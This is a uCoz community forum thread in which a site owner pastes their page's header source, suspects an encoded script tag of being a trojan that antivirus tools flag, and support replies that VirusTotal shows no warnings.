|
   |
| Forum moderator: bigblog |
| uCoz Community Communication uCoz Discussions My website is infested by a trojan (Help pls) |
| My website is infested by a trojan |
Hello uCoz support,
Please, my page fhsw-europ.ucoz.de has a malicious script in the headers of the webpage. I tried to remove it through Ad Board but the malicious code is not visible there. The source code of my page: <html id="root"> <head> <script type="text/javascript" src="/?c%21uD32lDOK4pY1cOgV65TAMYS0s7b83kvxKZaUpHXt2YiIK0kbe0YgQp337rE8qlrUYBWwhvpFQ7lFZS9YsP0bBK%5ENyFJL2XMT8%3BLJWPUxEQ4NZnGOm5X1tMCrm3e52m%21YHaO%3BaBprKjVGq1QTZehnVndye0ecce%21EvOMDF14PHqDmFECuPz8WWvfvLZV7GqhiYO2HOW8q%3BYm2FaGMCPOvGxGpUo"></script> <script type="text/javascript">new Image().src = "//counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+(screen&&";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth||screen.pixelDepth))+";u"+escape(document.URL)+";"+Date.now();</script> <script type="text/javascript">new Image().src = "//counter.yadro.ru/hit;ucoz_desktop_ad?r"+escape(document.referrer)+(screen&&";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth||screen.pixelDepth))+";u"+escape(document.URL)+";"+Date.now();</script> <script type="text/javascript"> var hst = location.host; if(hst.indexOf('.usite.pro') !== -1){ new Image().src = "//counter.yadro.ru/hit;zone_usitepro?r"+escape(document.referrer)+(screen&&";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth||screen.pixelDepth))+";u"+escape(document.URL)+";"+Date.now(); } if(hst.indexOf('.my1.ru') !== -1){ new Image().src = "//counter.yadro.ru/hit;zone_my1ru?r"+escape(document.referrer)+(screen&&";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth||screen.pixelDepth))+";u"+escape(document.URL)+";"+Date.now(); } if(hst.indexOf('.ucoz.net') !== -1){ new Image().src = "//counter.yadro.ru/hit;zone_ucoznet?r"+escape(document.referrer)+(screen&&";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth||screen.pixelDepth))+";u"+escape(document.URL)+";"+Date.now(); } </script> <script type="text/javascript"></script> <meta charset="utf-8"> <title>[FHSW] Europe - Mainpage</title> <link type="text/css" rel="stylesheet" href="/_st/my.css" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <script type="text/javascript"> var navTitle = 'Navigation'; var currentPageIdTemplate = 'sitePage1'; var currentModuleTemplate = 'index'; </script> And I expect the first script with very long source tag to be the issue. MalwareBytes blocks access to the page for numerous users and other AVs do that as well. Please, could you remove this script from my page? Thank you very much in advance. Post edited by bubu83945 - Saturday, 2021-05-01, 7:45 AM
|
Thank you very much for quick resolution Felicia! Also sorry for double posting on 2 different places. Didn't know whether the forum is active or so.
 Edit: I have checked right now and the Malwarebytes again is throwing the error and blocking the page due to the trojan. Can you please check again the page? I expect it got reinfected. Post edited by bubu83945 - Friday, 2021-05-07, 7:54 AM
|
bubu83945, where exactly are you checking this? On https://www.virustotal.com/ I see no warnings. https://prnt.sc/130w441 If it's an antivirus, please try contacting their support to see why you keep getting the error
Good things come to those who wait!
|
| |||
| |||